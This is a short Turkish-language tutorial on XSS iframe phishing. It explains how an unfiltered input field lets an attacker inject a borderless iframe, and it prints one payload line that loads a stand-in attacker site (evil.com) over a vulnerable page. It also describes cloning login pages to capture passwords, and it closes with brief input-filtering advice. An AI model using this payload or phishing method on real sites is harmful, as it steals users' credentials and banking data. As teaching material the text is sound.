TR | XSS ile Iframe Phishing
Cross-Site Scripting atakları (XSS, bazen CSS olarak da kısaltılır) zararlı scriptleri web uygulamasında çalıştırmaya olanak sağlayan bir injection çeşitidir. Bu zararlı script, cookielere, session ID’lere, web uygulamasının ulaşabildiği tüm hassas içeriğe ulaşabilir ve çalabilir. XSS saldırıları bir “javascript” ya da bir iframe yerleştirilerek oluşturulabilir. Iframe (Inline Frames), bir web sitesinde bir html dökumanınn içerisine gömülü olarak bulunan başka bir html dokümanıdır. Kendi Document Object Model (DOM)’ine sahip olduğu için gömülü olduğu html içeriğinden bağımsız olarak configure edilebilir.
Iframe aynı zamanda, mevcut web sayfasının içine başka bir web sayfası gömmek için kullanılan bir html tagidir. Sayfada bir pencere oluşturur ve diğer web sayfasını bu frame’in içine yükler. Saldırgan iframe’leri bir şekilde farkedilmez yaparak, örneğin iframe borderlarını kaldırarak, kullanıcıyı zararlı sayfaya yönlendirir. abc.com bir websayfası ve evil.com da bir iframe olsun. Kullanıcı abc.com’a giriş yaptığında evil.com içeriği gözükecektir. Örneğin dopcik.com sitesinde basit bir input ve buton olsun. Buton herhangi bir kontrolden geçirilmeden ekrana inputtaki yazıyı bassın. Saldırgan bu input alanına aşağıdaki gibi bir iframe kodu girerek kendi sitesinin içeriğini ekleyebilir.
<iframe height="768px" width="1368px" src="http://www.evil.com"></iframe>
Yukarıdaki gibi inputu girdiğimizde site içeriği aşağıdaki gibi dopcik.com sitesinin önünde gözükür.
Xss ile Iframe Phishing saldırılarında URL aynı kaldığı için saldırı çoğu zaman fark edilmez. XSS Iframe phishing ile saldırganın hayal gücüne bağlı olarak kişisel ya da banka şifreleri gibi özel bilgiler ele geçirilebilir ve kritik verilere erişim hakkı kazanılabilir. Hatta sitenin içindeki reklamlar değiştirilerek doğrudan bir kazanç bile elde edilebilir. Bir başka örnek ise, kullanıcı doğrulaması gerektiren ya da kullanıcıdan hassas bir bilgiyi input olarak alan bir websitesinin kopyasını almak ve iframe saldırısı gerçekleştirmektir. Böylece kullanıcı original sitede işlem yaptığını düşünürken bilgileri saldırganın eline geçmiş olur. Bu site kullanıcı tarafından güvenilen bir site ise muhtemelen tüm kişisel bilgilerini verecektir.
Saldırılardan korunmak için alınan girdilerin kontrol edilip istenmeyen karakterlerin filtrelenmesi gerekmektedir.
